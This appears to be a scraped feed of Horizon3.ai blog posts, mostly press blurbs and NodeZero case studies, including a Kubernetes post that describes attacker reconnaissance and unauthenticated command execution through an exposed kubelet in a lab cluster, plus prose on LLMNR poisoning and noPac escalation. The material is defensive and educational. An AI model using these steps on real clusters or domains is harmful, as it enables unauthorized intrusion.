Normal view

There are new articles available, click to refresh the page.
Before yesterdayHorizon3.ai

New PyPi Malware Steals Discord And Roblox Credential & Payment Info: Sync

19 August 2022 at 14:26

The IT Nerd: 08/19/22

Obviously, Roblox and Discord need to do more to protect the majority of young users on their platforms. Most concerns center on the platform’s procedures to protect user privacy, in which many Discorders find their data being collected by anonymous APIs. 

Read the entire article here

The post New PyPi Malware Steals Discord And Roblox Credential & Payment Info: Sync appeared first on Horizon3.ai.

Horizon3.ai Wins Most Promising Early-Stage Startup in 2022 SC Awards

22 August 2022 at 13:14

Businesswire: 08/22/22

Horizon3.ai announced that it has been recognized as an Excellence Award winner in the Most Promising Early-Stage Startup category for the 2022 SC Awards. Now in its 25th year, the industry awards program is cybersecurity’s most prestigious and competitive program, recognizing the solutions, organizations, and people driving innovation and success in information security.

Read the entire article here

The post Horizon3.ai Wins Most Promising Early-Stage Startup in 2022 SC Awards appeared first on Horizon3.ai.

Most Promising Early-Stage Start Up | Horizon3.ai

22 August 2022 at 13:16

SC Media: 08/22/22

Horizon3.ai has developed, NodeZero, an autonomous penetration testing platform that continuously assesses an enterprise’s attack surface, identifying ways an attacker could chain together harvested credentials, misconfigurations, dangerous product defaults, and exploitable vulnerabilities to compromise systems and data.

Read the entire article here

The post Most Promising Early-Stage Start Up | Horizon3.ai appeared first on Horizon3.ai.

Who wins: Characteristics of a promising startup

22 August 2022 at 17:19

SC Media: 08/22/22

Despite a tumultuous market, cybersecurity companies continue to draw millions in venture dollars. So how can startups and investors alike best leverage the relationship? As part of the SC Awards Winners Circle video series, SC Media dug into this dynamic with Dave DeWalt, founder and managing director of NightDragon, recipient of our Best Growth-Stage Investor Of The Year award; Ofer Schreiber, senior partner and head of the Israeli office at YL Ventures, recipient of Early-Stage Investor Of The Year award; and Monti Knode, director of customer success at Horizon3.ai, recipient of the Most Promising Early-Stage Startup award.

Read the entire article here

The post Who wins: Characteristics of a promising startup appeared first on Horizon3.ai.

NodeZero: Filling a Unique Niche in Cybersecurity

23 August 2022 at 16:18

When an IT and cybersecurity team from a U.S.-based management consulting organization were searching for ways to improve their penetration testing, NodeZero and Horizon3.ai were able to answer the call.

“We’d done some penetration testing in the past, and it was quite expensive,” says the organization’s infrastructure manager. “We were looking to do this on a more regular cadence and looking at different solutions we could implement.”

After running into a team member from Horizon3.ai, they shared a rundown of what they were looking for and felt that NodeZero might be just what the situation called for.

“I liked the ease of implementation and use of the product,” he says. “And the ability to just do constant scanning and fixes without having to pay for every instance was the biggest appeal.”

The organization’s director of IT noted that there were solutions he’d encountered that could do external pentesting, but what they really needed at this stage was powerful internal pentesting capabilities.

“Looking at vulnerabilities and criticality was key for us,” he says. “And the biggest thing for me was having a full-package pentest, with all the functionality you needed to really look for and tackle vulnerabilities accordingly.”

The struggle to keep up

The organization’s biggest struggle at the time was simply being able to keep up with a small team – they didn’t have a dedicated team member to keep up with alerts and investigations.

“We wanted to be able to identify vulnerabilities ahead of time and keep ahead of the game,” says their infrastructure manager. “In the past, when we were doing scans, we were able to identify issues – fortunately none required significant time to fix – but being able to identify those things and act on them before they can be exploited is huge for us with a small team.”

“In looking at and enforcing our security strategy, we’re trying to implement controls – and with NodeZero, we’re able to implement the right controls and software we need to better our environment,” says their director of IT.

This also helps with various compliance requirements, a key component to the security team’s mission, as well as uncover any major vulnerabilities in the environment.

More frequent testing

The team wanted to be able to go in and do internal ops more often, something NodeZero makes uniquely possible.

“Being able to perform on-demand scans is really great – we can scan, make adjustments, and then run another scan to verify we’ve been successful,” says their infrastructure manager.

“We’re taking security to a higher level within the organization to obtain certifications in compliance, and this is going to help with that a lot,” says their director of IT.

Cost effectiveness and efficiency

One of the strongest draws to NodeZero was the ability to run those repeated pentest operations anytime and anywhere they needed them – without incurring additional costs.

“It’s just much more cost effective and easier to deal with the licensing,” says their infrastructure manager.

And to be able to run those operations for internal pentesting set it apart from other options on the market, says their director of IT.

“It’s one thing attacking an organization from the outside, but when attacking from the inside, you need to understand it and have the capabilities to do it,” he says. “I feel NodeZero has the capacity to do that.”
Getting up and running with NodeZero was quick and easy rather than adding cycles to a team that was already running lean.

“Setting up a scan is relatively quick and painless to do,” says their infrastructure manager.

“And even the reports are very intuitive – what the report surfaces and what we need to do to mitigate that,” says their director of IT.

It’s also enabled a frequency of testing they wanted, rather than being limited by the time and cost of standard penetration tests. Before NodeZero, the organization conducted pentests once or twice a year. They already plan to increase this to quarterly, or more – maximizing their return on investment.

NodeZero enables customers to turn a small team into their own seasoned and veteran team.

“It takes a lot of the work our team would have to go through to conduct these investigations, finds vulnerabilities and tells us what needs to happen, and even ranks those vulnerabilities and tells us why something should be considered more urgent than others,” says their infrastructure manager. “It helps prioritize work for optimal impact and address those issues that are going to be critical
to our environment soonest.”

“NodeZero, I think, fills a huge missing niche. Not just the skill set or background of company but the actual product, enabling you to do internal and external vulnerability testing to mitigate the issues most people are facing,” says their director of IT.

If you’d like to see how NodeZero works with your organization, have our experts walk you through a demo.

Download the PDF version

The post NodeZero: Filling a Unique Niche in Cybersecurity appeared first on Horizon3.ai.

Beyond Password Issues: How NodeZero Found Access to an Organization’s Azure Cloud Environment  

25 August 2022 at 19:24

NodeZero is a generational leap beyond a traditional pentest – organizations often see that for themselves from the moment they give our autonomous pentesting platform a shot. NodeZero surfaces risks and weaknesses that would never have come up during a general vulnerability scan as it chains together attack tactics and techniques to illuminate your most critical impacts an attacker could generate.

Take for example a recent NodeZero operation run by an organization in the wholesale distribution sector. What at first appeared to be minor “password issues” led to a high-risk attack path enabling NodeZero to access the domain admin accounts, and even break into the organization’s Azure cloud environment. 

From here, NodeZero could pivot and impact day-to-day operations, such as compromising their business email, but more to follow on that below. 

To start, NodeZero performed a host discovery and found weaknesses through the LLMNR (Link-Local Multicast Name Resolution) protocol, poisoning a host and capturing an unverified credential. (LLMNR is a service used by Windows to resolve hostnames to IP addresses when a DNS request fails in a network.) 

The first thing NodeZero did at that point was to try to crack the hash, which it did in under five minutes. 

NodeZero obfuscates usernames and passwords prior to destroying those records after every pentest, in order to verify that NodeZero was successfully able to obtain them. In this case, “when we see a capital P at the beginning and an exclamation point at the end, that doesn’t bode well,” says Monti Knode, Director of Customer Success with Horizon3.ai. This usually, as you likely already know, means it’s a default or extremely common password. 

Making matters worse, this was a privileged account.

Now that NodeZero had the name and password, it attempted to log in to the domain – and in this case, it was able to do so as a Domain Administrator immediately leading to a domain compromise on this domain controller with full read/write access permissions. 

An attack graph demonstrating how NodeZero obtained access to the customer's Azure network.

An attack graph demonstrating how NodeZero obtained access to the customer’s Azure Cloud.

Domain compromise not once but twice

 A business email compromise enabled NodeZero to take a regular user’s credentials – found while trying to log into the domain – and leverage that to find other credentials. It then could find a domain user, impersonate them, and gain additional control over a second domain admin. 

With this second credential, NodeZero elevated a regular user with no rights to domain admin by taking advantage of the noPAC vulnerability. A little background: In mid-December 2021, noPac, a public exploit that combined two Microsoft Active Directory design flaws, was released; it allowed escalation of privileges of a regular domain user to domain admin, which then enabled malicious actors to launch multiple attacks, including domain takeovers or ransomware attacks.

“That’s why this vulnerability is at the top of the weakness list,” says Knode. “If we were to recommend one thing to fix in this case, it would be that noPac vulnerability.” 

NodeZero offers a Fix Action linking to the knowledge base information needed so the organization could move on a fix action to get those domain controllers patched and protected. 

NodeZero offers context for the vulnerability, related credentials and impacts, and the knowledge needed to fix and maintain so the organization has the education and tools to keep it updated in the future. 

The impact component is vitally important, as by offering context scoring, the customer can see why a weakness that leads to critical impacts in a network gets prioritized to the top of the list of recommended fixes. 

The customer can even rerun a “1-click Verify” pentest on just those hosts where there is a known weakness. “Something like this should be a fairly easy one to do, and we highly recommend it – follow our Fix Actions for those noPac vulnerabilities, select the 1-click Verify option to follow up, and then rerun this more surgical operation as soon as you get the chance,” says Knode. 

 Business email compromise 

NodeZero was also able to execute a business email compromise chaining an attack from the previously successful LLMNR poisoning technique. In this case, NodeZero found that this user was a tenant on the company’s Azure account and from the domain user, was able to pivot for further access. Multi-factor authentication (MFA) was not activated, so NodeZero was able to gain access into their Azure cloud environment and then get into Outlook. 

With this valid domain account, NodeZero accessed 25 business emails, and as proof, NodeZero showed the customer the subject lines of the  emails it was able to access. 

“NodeZero took advantage of the Active Directory login because MFA was disabled on Azure,” says Knode. 

With MFA turned off, NodeZero stuffed the newly captured credential and the issue bumped up to a 9.9 on the criticality scale. Implementing Multi Factor Authentication is recommended throughout network zones and data access points, and it was highly recommended that MFA was turned “on” for cloud access, limiting an attacker’s ability to take advantage of their Azure service. 

Some of these paths can get complicated, but there are fix-actions the customer can go forward with. 

“They have password and credential policy problems, but there were some really high priority fixes they could remediate and see immediate risk reduction,” says Knode. “You don’t have to fix everything. You can fix what matters most, and then verify the fix by running a pentest and aligning it to the scope to see immediately if the fix worked.” 

What are you using, and does it work? 

One question that comes up time and time again in IT is: are the solutions I’ve already paid for effective? 

The NodeZero customer success team asks an organization if they received any alerts about this vulnerability. Was it detected, logged, alerted to, and was it stopped? 

In these instances, this did not happen. 

When NodeZero was able to dump these credentials, an EDR should absolutely have issued an alert and their antivirus solution should have stopped it. 

“We recommend looking into this,” says Knode. “We’re transparent with every action NodeZero takes, so you can go through and see. Export the report and take a look.” 

We recommended this organization go back, check logs to see if the incident was detected and logged, and if it wasn’t, ask how someone was able to dump your credentials and why it wasn’t logged, alerted, or stopped. 

“Nobody should be able to do this without setting off a trigger and an alert,” says Knode. 

From there Horizon3.ai went through the ops, helped plan a strategy, and looked at next steps. Customers can also take the information NodeZero provides in its reporting features to take the steps on their own. 

“We’re not trying to ‘pwn’ organizations, we’re not trying to poke them in the face and make them look bad – we want to make sure their security stack is putting out every ounce of protection they want from it,” says Knode. 

Want to see NodeZero in action for yourself? Schedule a demo today. 

The post Beyond Password Issues: How NodeZero Found Access to an Organization’s Azure Cloud Environment   appeared first on Horizon3.ai.

An International Look at Cybercrime

29 August 2022 at 15:19

Authoritarian regimes have learned in recent years that cybercrime can be a profitable economic enterprise ­– so much so that they continue to invest substantial resources in large- and small-scale cybercrime. This lucrative work goes on to fund their governments and their lavish lifestyles, among other things.

These nefarious nation state actors – North Korea, Iran, Russia, and China – all steal large sums of money by targeting Western infrastructure, private and public organizations, and sometimes even outspoken entities that speak openly against each of them. Furthermore, these nation state actors have long seen the West as an existential threat on the global stage for a multitude of reasons, especially in the realms of economy, infrastructure, intelligence and military affairs.

Economically, the battle between communism and capitalistic agendas rages on, with stiff competition between Eastern and Western technology, energy, manufacturing, and more For example, China uses its global Belt and Road initiative (BRI) under the guise of helping struggling economies to gain influence and essentially creating debt traps for unsuspecting countries. Meanwhile, maritime power has reemerged as a vehicle for control and asserting dominance over disputed territories (referring to China’s ambitions for Taiwan and controlling the parts of the Pacific, so far, an icy stalemate). Conflicts are also being fought on land, as seen with Russia’s invasion of Ukraine and Iran’s continued tensions with Israel and the U.S. regarding their nuclear agenda.

The Link Between Cybersecurity and Geopolitics

With this gradual increase in global cyber competition, it is no wonder that nation states continue to invest in cyber infrastructure and predominantly fight in the cyber world. Many are correct to believe that cybersecurity and geopolitics are directly linked. If anything, businesses have learned this lesson the hard way. Just because they are private sector and a multinational organization does not mean they are invincible to an enemy nation’s ransomware and cyberattacks. Or better yet, a private business operating abroad becomes a target for spyware (China BRI and cyber giant Huawei) out of the suspicion they are harboring their home country’s government secrets and hold “the keys to the castle.”

Overall, despite a nation state’s obvious agenda for zeroing in on military and government targets, such adversaries have become bolder and less dismissive of attacking private businesses, regardless of that company’s allegiance to serving consumers internationally. For example: As of late, many have pointed fingers at Russia to blame for recent attacks on American companies as big as Microsoft, Apple, Cisco (etc.) as well as being the true culprits of the SolarWinds fiasco in 2020.

As Dangerous as the Wild West

Due to such actions, the cyber world is now as dangerous as the Wild West. The question is, how are businesses and everyday citizens supposed to live while being caught in the chaotic influx of criminalistic and outlaw-ish rivalry?

The answer is: They do not. Cybersecurity has become a constant in daily life, and enemy nation states are part of the reason why. Every day, another business is on the news because it has been hacked by foreign threat actors who, with sophisticated and unsophisticated techniques, manage to destroy the finances, ambitions, and public reputation of a once-respected economic contributor.

Looking back to 10 years ago, it would be hard to believe then believe that extraordinary measures (such as firewalls, multi-factor authentication, intrusion detection and prevention systems, etc.) would now need to be implemented to defend against malicious advanced persistent threats (APTs). However, business today means realizing that nobody is safe. It does not matter anymore what industry an organization belongs to or what product they peddle.

Unfortunately, businesses across the globe are not safe from APTS, regardless of industry, sector or affiliation. APTS tactics techniques and procedures (TTPs) continue to advance, and so should business TTPs when protecting against threats.

Therefore, every private institution needs to align their policies to thinking “security first.” While most businesses have IT departments, many still lack a well-trained and sophisticated cybersecurity team within their organization. Such changes for a more secure network and security structure need to be made, as well as recruiting for the people who can do the job effectively (not just a one-person team). If companies fail to get started before it is too late, most of the world will find themselves at the mercy of cyber outlaws and APTS.

This post was authored by the Cyber Threat Analyst Team: Al MartinekCorey Sinclair and Taylor Ellis. 

The post An International Look at Cybercrime appeared first on Horizon3.ai.

Healthcare Staffing Organization Puts Cybersecurity Best Practices in Place with NodeZero

31 August 2022 at 15:29

The director of security engineering at a national healthcare staffing organization grew up wanting to be a hacker, and he found that NodeZero’s ability to provide the attacker’s perspective to help better protect his organization was a perfect fit for keeping his organization safe.

“Security has always been on my mind. Protecting company assets have always been on my mind. We’d reached a point where our organization is big enough, people are working remotely, and I wanted to split off some of my roles and be ultimately dedicated to security,” he says.

One of the challenges he has faced over the years has been convincing the c-suite to focus on security. They always had compliance in mind and policies in place, but the organization struggles with aging software without a development cycle or vendors who didn’t support software when it aged out or broke down.

As a publicly traded company, they ran their annual penetration tests on their roughly 900-1,200 hosts and performed well – they had a strong firewall in place protecting them from outside threats.

“But we have ancient software inside, and one of the great things about NodeZero is that it’s internally focused. In my mind, that’s where the threats will come from,” he says.

The first time he ran NodeZero, it was able to obtain domain admin access in 17 minutes via an overlooked machine that shared a password with other machines. It also surfaced risks and vulnerabilities that those aging machines and systems internally may have otherwise made difficult to find.

“We have folks, who have come and gone, who may have built servers I’m not aware of, that we don’t know about until NodeZero finds them, finds the misconfigurations, and helps us remediate them,” he says.

Immediate, Actionable Results

Before NodeZero, the organization would run one external pentest and one scan to check on their remediation actions.

The pentest would, regardless of vendor, use the same tools.

“You get a PDF telling your execs how you suck, and 99 percent of the stuff that says you suck are things that are such low priority you don’t care about them,” he says. “I love that with NodeZero, those are identified as low-priority, such as expired SSL certs, very minor things.”

Because other options all felt cookie cutter, with no difference in quality, leadership simply wanted the cheapest, easiest option to check that box. Cost was always a struggle – with security being seen as an annoying expense – until a key leader re-joined the company having survived a ransomware attack with his previous organization who now had security at top of mind.

“He asked, what are you missing? I told him endpoint protection, and we had the contract signed the next day,” he says.

When it came time for addressing pentesting, there was some pushback between the dev and infrastructure teams, but once they ran a demo of NodeZero, the teams fell in line.

I showed the demo to our network guy, who’s as big a cynic as I am and he was blown away, saying ‘this is what we need,’” he says.

This was all happening right around the time the Log4Shell vulnerability was the talk of the cybersecurity world.

“Log4j was everywhere,” he says, but running NodeZero offered actionable mitigation right away, whereas other tools they were using at the time had a lag time of weeks.

From Once a Year to Once a Month

The organization now runs NodeZero once a month, and then retests mid-month. With NodeZero they’re able to show progress better than ever before.

“Audit and compliance guys would look at the number of vulnerabilities in a 90-day period and say the numbers have gone up, you haven’t fixed anything,” he says. “But we’re able to show them that these are new weaknesses, and that new vulnerabilities come up all the time. We’re not being measured against those 90 days, and we can compare in the middle of the month to see what’s been fixed.”

In fact, with NodeZero running, the only issues his team has not fixed are due to manpower, not because of testing.

“Honestly, anything that hasn’t been addressed is a resource issue on our side,” he explained.

And, NodeZero has helped improve their results from other tools and resources. They were able to improve notification of attacks from their MSSP from four hours to fifteen minutes and validated their endpoint protection by verifying that the pentests are immediately detected and alerts issued – all enabling them to get more out of existing expenditures.

NodeZero has improved their overall accuracy, such as identifying a false positive that came up time and time again with Adobe Flash that was no longer being used but could not be removed from some older machines.

Doing Things Other Vendors Don’t

“I don’t think you have any other competitors,” he says. “I’d a have to go out and get a red team to do what NodeZero does, and it would cost twice as much for one scan.”

He also appreciates that NodeZero doesn’t just stop when it finds a vulnerability – it keeps digging. “It chains attacks, which other pentesters don’t do,” he says. “Hackers don’t say hey, I got access to this, I’ll stop here. That’s not how they operate.”

As a once-aspiring hacker himself, their director of security engineering knows that anyone who says they are 100% secure is either dishonest or naïve.

“You are going to get breached. It’s going to happen,” he says. “But the more you understand, the better you can lock things down and limit the blast radius.”

If you’d like to see how NodeZero works with your organization, have our experts walk you through a demo.

Download the PDF version

The post Healthcare Staffing Organization Puts Cybersecurity Best Practices in Place with NodeZero appeared first on Horizon3.ai.

Are Your Kubernetes Clusters Configured Properly?

31 August 2022 at 18:16

TL;DR: Given recent news about misconfigured Kubernetes clusters, it’s a great time to review best practices for ensuring the security configurations for your own Kubernetes network. Read on to learn more.

Researchers recently discovered some 900,000 Kubernetes clusters that were potentially exposed to malicious scans and data theft during a threat-hunting exercise. The vast majority of those clusters responded with 401 Unauthorized or 403 Forbidden errors, and while that’s better than being completely exposed, it doesn’t mean that they’re necessarily configured properly. Any time a number like that hits the headlines, cybersecurity professionals can feel that familiar twist in their stomach: please don’t let that number include me.   

Let’s take a look through the eyes of an attacker at a Kubernetes environment. First, it’s important to understand that Kubernetes utilizes HTTP and HTTPS APIs for communication between its various components. The APIs are well documented and transparent, meaning the APIs we’ll be using are the same ones the Kubernetes components use. There are no hidden APIs that get used behind the scenes which makes enumeration fairly and interacting with Kubernetes straight forward. 

Our generalized attack flow will be: identify IPs hosting possible Kubernetes components, enumerate against default Kubernetes ports, determine the version of Kubernetes running, check the cluster for vulnerabilities or misconfigurations and finally exploit the vulnerabilities.   

As mentioned in the above article, identifying Kubernetes clusters can be done with online scanners like Shodan.io. A few default Shodan queries include: 

  • title:”Kubernetes Dashboard” 
  • product:kubernetes 
  • Kubernetes 

For a more targeted attack, an IP address, GET requests and knowledge of the Kubernetes API is all you need. The responses from GET requests can indicate whether or not Kubernetes is running on a given port. For the rest of this article, we’ll be using a cluster set up in our development lab and deliberately misconfigured. We’ll use ‘curl’ to send a GET request to the default Kubernetes API server port (6443) and check the response. Initially we get a ‘403 Forbidden’ error. The message “forbidden: User \”system:anonymous\” cannot get path” is a hint that the request was blocked by Kubernetes Role-based Access Controls (RBAC) as ‘system:anonymous’ is a built-in Kubernetes user and is used when an authenticated user or service account isn’t used to make the request. 

A GET request to the default Kubernetes API server port (6443) to check the response.

A GET request to the default Kubernetes API server port (6443) to check the response.

Let’s make the same request but this time ask ‘curl’ to display the response headers as well using the ‘-i‘ flag. 

An additional request, asking ‘curl’ to display the response headers as well as the ‘-I' flag.

An additional request, asking ‘curl’ to display the response headers as well as the ‘-I’ flag.

While we still get the same 403 Forbidden response back, there are two headers that stand out in the response: ‘x-kubernetes-pf-flowschema-uid’ and ‘x-kubernetes-pf-prioritylevel-uid’. These headers are included in responses from default Kubernetes deployments. An additional method to identify a cluster is to inspect the Subject Alternative Name (SAN) in the SSL certificate being used. If the certificate is a self-signed certificate generated by Kubernetes during its deployment, you’ll see something similar to the following: “DNS:kubernetes, DNS:kubernetes.default, DNS:kubernetes.default.svc, DNS:kubernetes.default.svc.cluster.local”.  

Now that we, the attackers, have identified a Kubernetes cluster, we’ll again use ‘curl’ to see if we can determine the version of Kubernetes that is deployed. There are two API resources we’ll check. The first is the API server running on port 6443 and the other is the kubelet with runs by default on port 10250 (HTTPS). First we’ll check the API server to see if it leaks the version information. 

Checking the API server to see if it leaks the version information.

Checking the API server to see if it leaks the version information.

Looking at the output, we see the major, minor, and gitVersion listed. This tells us that we’re running Kubernetes 1.24.3. Now let’s try the kubelet component to see if we can get it to respond. If it responds, there’ll be a flood of information. We can narrow down the output to the version information by using ‘grep’.  

Narrowing down the output to the version information using ’grep’.

Narrowing down the output to the version information using ’grep’.

Here again we see the git_version in the output with the value of “v1.24.3”. Why is the version information important to an attacker? Well, the Kubernetes APIs are ever evolving and improving as new features are added and old APIs are deprecated. This means that the Kubernetes components are sensitive to version skew. Attackers can use the Kubernetes command-line tool, kubectl, to interact with a vulnerable cluster. They’ll want to make sure that the version of kubectl they are using matches with the major and minor version of the cluster they are attacking as this will eliminate any issues they may encounter due to changed APIs.  

Getting a response from the kubelet indicates that it is misconfigured. The kubelet is a Kubernetes component that runs on each node as the primary “node agent.” It communicates with the API server and is responsible for ensuring the containers on that node are running and healthy. A kubelet with open access means an attacker may have the ability to read information about the pods on a node or read the logs of the containers. Worse yet, the attackers may be able to run arbitrary commands inside of the existing containers or to start containers of their own. 

Using ‘curl’ we can get a list of pods on the node. We’ll use ‘jq’ to clean up the output and extract only the pod names. 

Using ‘jq’ to clean up the output and extract only pod names.

Using ‘jq’ to clean up the output and extract only pod names.

Taking this a step further, let’s see if we can run a command inside one of the containers. We’ll keep it simple and see if we can run an ‘ls -al’. In addition to the pod name, we’ll need the namespace and container name we want to run the command in. We can of course get all that information from the kubelet and in fact we’ll use the same command we just used with just a small tweak to the ‘jq’ output. 

Testing to see if a command can be run inside one of the containers.

Testing to see if a command can be run inside one of the containers.

Now with all the information we need, we can attempt to run a command in the calico-node-8krgh pod. This time instead of a GET request, we’ll use ‘curl’ to send a POST to the /run API with the namespace, pod, and container as parameters and the command we want to run as the body of the request. 

Using ‘curl’ to send a POST to the /run API with the namespace, pod, and container as parameters and the command we want to run as the body of the request. 

Using ‘curl’ to send a POST to the /run API with the namespace, pod, and container as parameters and the command we want to run as the body of the request.

At this point, the attackers have free rein within this pod and container to do what they like. The next step would be a container escape and full compromise of the host running the cluster. 

Improving Your Kubernetes Environment’s Security Configurations 

We’ve just demonstrated how a couple of simple misconfigurations can quickly lead to a significant compromise of your infrastructure. But that’s just one example attack path against one or two misconfigured items. With as complex as Kubernetes can get, it can be easy to misconfigure a component. So instead of resolving the specific misconfigurations one-by-one from above, here’s some overarching guidance that will help improve your overall security posture. 

First, understand and correctly apply Role-Based access controls (RBAC) to your cluster. RBAC provides a system to restrict access and prevent subjects from making requests to resources that they don’t have access to. It consists of three primary items; the resource, the verb and the subject. The resource is the Kubernetes API resource type like a node or a pod. The verb is what operation can be performed on the resource like create or list. The subject is a user, group, or service account that is making the request. Properly applied RBAC in the scenario above would have prevented any of the anonymous requests.   

Second, limit your exposed surface. The Kubernetes dashboard is a good user tool that can aid in the administration of your cluster. However, it is likely not a good idea to expose the dashboard to the internet even with the correct permissions and authentication in place. If the only people that need access to the dashboard are the infrastructure team and they only access it from your intranet, then make sure it hasn’t been accidentally exposed to the internet. There are several ways to expose a service to external users. The variety of methods and complexity of Kubernetes networking can make it non-trivial to do correctly. Don’t assume that because service is exposed on an ephemeral high port that it’s configured correctly and not accessible from external sources. 

Finally, regularly verify the security of your cluster. Kubernetes is a complex system. The more pods you deploy, the more services you expose, the more complex it gets. Your security posture today isn’t the same as it will be tomorrow. Verify your security whenever you make a change to your configuration or deployment. This can be the hardest recommendation to follow as infrastructure is constantly changing and thoroughly checking your cluster security COULD be a long and painstaking process, but it doesn’t have to be. This is where NodeZero shines! 

Verify your cluster security with NodeZero 

NodeZero runs an autonomous penetration test when you want or need to. You’ll get results quickly, and rather than a laundry list of risks, your vulnerabilities will be listed by criticality, so you can move quickly on the biggest risks right away. NodeZero will also show you how it was able to discover the vulnerabilities and it will provide proof of the exposure so you don’t have to wonder where or how you are exposed. 

We’ve significantly expanded our coverage of Kubernetes vulnerabilities and misconfigurations. NodeZero will enumerate your endpoints and determine if a Kubernetes cluster is being hosted. If it determines that there is a cluster present, it will proceed to test the cluster for exposed nodes, services and ports. As soon as NodeZero finishes, you’ll get a prioritized list of weaknesses discovered. 

Prioritized weaknesses discovered in a cluster.

Prioritized weaknesses discovered in a cluster.

NodeZero won’t just tell you that your cluster is vulnerable though. It’ll show you, both how it discovered the weakness and proof of the weakness either in the form of a screenshot or output from a command abusing the weakness. 

Path to Unauthenticated Kubernetes API Server Access.

Path to Unauthenticated Kubernetes API Server Access.

Proof of Unauthenticated Kubernetes API Server Access.

Proof of Unauthenticated Kubernetes API Server Access.

The fact that so many Kubernetes clusters exist today, misconfigured and exposed, highlights the need for more frequent penetration testing with faster turnaround time. NodeZero finds misconfigurations and vulnerabilities so fixes can happen quickly, and those fixes can be verified just as fast.  

Run the test. Get the results. Make the fixes you need to make – and then, re-run the test to verify that your Kubernetes clusters are not at risk. Don’t wait for your annual pentest to find out you’ve still got clusters running default settings, or that your dashboard is unprotected.   

And best of all, with NodeZero, the next time you see breaking cybersecurity news that keeps you up at night, you can run a test right then and there to make sure you’re not on the list of potential victims. 

Schedule a demo today to find out if you’re vulnerable.  

Horizon3.ai’s Travis Fahlgren, Senior Engineer, and Trampas Howe, Offensive Security Expert, contributed to this report.  

 

 

The post Are Your Kubernetes Clusters Configured Properly? appeared first on Horizon3.ai.

Patched ≠ Remediated: Healthcare Faces an Aggressive Threat Landscape

12 September 2022 at 16:23

Healthcare Data Breaches Bar Chart

The Challenge: Healthcare Faces an Aggressive Threat Landscape.

One of our clients, a leading U.S. hospital and healthcare system, consistently earns high marks for clinical excellence and is among the top 10 percent in the nation for patient safety. Recognizing the growing cybersecurity threats to healthcare organizations and importance of importance of maintaining compliance with regulatory standards like HIPAA, PCI, and other privacy rules, the organization’s IT staff worked hard to ensure a strong security posture.

Our client’s IT team had adopted many security best practices and tools, including state-of-the-art firewalls, vulnerability scanning, endpoint detection and response (EDR), automated patch management, network segmentation, and a managed security service provider (MSSP). In addition, the team began implementing a zero-trust architecture and has tools to monitor the many specialized medical devices on its hospital networks.

Even with these comprehensive security practices in place, the team wanted to do more. Hackers have increasingly targeted the healthcare industry. In 2020, over 600 data breaches of 500 or more patient records were reported. Ransomware attacks continue to be extensively used against healthcare organizations, and these attacks are becoming more costly.

The Solution: NodeZero™ Automated Red Teaming

Liberman Networks, a managed security and IT services company, recognized that even with their many controls implemented, our client could still be vulnerable to an attack.
Liberman Networks called on Horizon3.ai to help validate our client’s defenses and provide proof of what was truly effective and which deficiencies remained.

Our client used Horizon3.ai’s NodeZero – a fully autonomous SaaS offering that views the network from the attacker’s perspective – to conduct a comprehensive penetration test across its enterprise. In a matter of minutes and with virtually no configuration, NodeZero began its reconnaissance, mapping the organization’s infrastructure and over 8,400 hosts, probing for misconfigurations, open ports, and other vulnerabilities an attacker could exploit, whether alone or by chaining multiple weaknesses.
Patched does not equal Remediated Attack Path

The Findings: Unauthenticated Access to Domain Controller’s

NodeZero ran for eight days with no adverse impact to the network.

NodeZero identified 31 vulnerabilities with 278 unique attack paths, proofs for each, and remediation guidance.

The most significant and surprising finding was immediately communicated to our client by Liberman Networks – even before NodeZero completed its testing. Ten Microsoft Active Directory domain controllers included ZeroLogon – a “critical” and potentially catastrophic privilege escalation vulnerability allowing unauthenticated accesses to devices first disclosed a year prior to the NodeZero test. Worse, an exploit was publicly available, making the vulnerability an easy target. Had attackers targeted the vulnerable hosts they could have quickly created their own credentials and gained unfettered access to every system in the organization. The result could include stealing patient information and financial data or installing ransomware on our client’s endpoints and databases.

Patched does not equal Remediated Findings Stats

“We patched this back in February. All of our reporting shows it as patched.” — Director of Infrastructure

Lesson 1: Reporting Tools Can Lie.

At first, our client believed NodeZero was in error. They were diligent in their patching and their records showed a successful update for the ZeroLogon vulnerability months earlier. Our client also had evidence; reporting from Qualys and Microsoft Deployment Image Servicing and Management (DISM) showed all systems were patched, and they trusted their tools.

In this case trusting the tools was a mistake. Liberman Networks and Horizon3.ai’s customer success team investigated further and confirmed that the updates had been unsuccessful. When our client reapplied patches to the 10 servers, a subsequent test by Liberman Networks and Horizon3.ai showed that 4 of the 10 devices remained vulnerable – despite showing as patched – again – in Microsoft.

A security solution blocked security updates for 18 months.

After further analysis, our client found the problem; a misconfiguration in their EDR solution had blocked patches on the domain controllers for the past 18 months! The failures were not propagated back to the patch management system, resulting in their vulnerability management and monitoring tools to incorrectly report a successful patch install. After manually pushing patches to each domain controller NodeZero was quickly re-run, proving that the problem had truly
been remediated.

“This is a good experience for me to teach the team the importance of credential use and reuse. We never would have found this vulnerability without NodeZero.” — Director of Infrastructure

Patched does not equal Remediated Timeline

Lesson 2: Patching ≠ Remediation

The lesson our client learned was simple; patching is not the same as remediating. Our client followed standard best practices in the defenses. They tracked security updates to their systems, promptly patched for critical issues using industry-leading tools and verified the patches using Microsoft DISM. As they saw, the tools can be wrong, leaving organizations vulnerable to attacks.

With assistance from Horizon3.ai and Liberman Networks, our client’s IT staff improved their security profile and their internal in monitoring, detection, and response skills. The IT team’s increased knowledge and confidence is generating greater trust in IT by the business. By using an offensive strategy to test its defenses, the healthcare system is evolving its cybersecurity posture to match the threat landscape that it faces.

Lesson 3: Follow Patch Tuesday with Pentest Wednesday.

According to the NIST Cyber Security Framework, organizations should validate through systematic audit and assessment that they have truly fixed vulnerabilities after deploying patches. In reality, most IT teams lack the resources to do penetration testing after every patch.

After their experience with misreported patching – with proof from Liberman Networks and NodeZero – our client added a step to “Patch Tuesday”: “Pentest Wednesday” with NodeZero to validate all patches are correctly implemented and risks are mitigated.

Download as PDF

The post Patched ≠ Remediated: Healthcare Faces an Aggressive Threat Landscape appeared first on Horizon3.ai.

Horizon3.ai Drives Global Partner-First Approach with Expansion of Partner Program

27 September 2022 at 13:16

Businesswire: 09/27/22

Horizon3.ai announced it has expanded its partner program to include new rewards, incentives, training, and tools to help partners drive more recurring revenue. The mission of the Horizon3.ai Partner Program is to drive growth opportunities for partners and position them as trusted advisors for their clients.

Read the entire article here

The post Horizon3.ai Drives Global Partner-First Approach with Expansion of Partner Program appeared first on Horizon3.ai.

Vulnerable ≠ Exploitable: A lesson on prioritization

13 September 2022 at 15:17

The Typical Approach

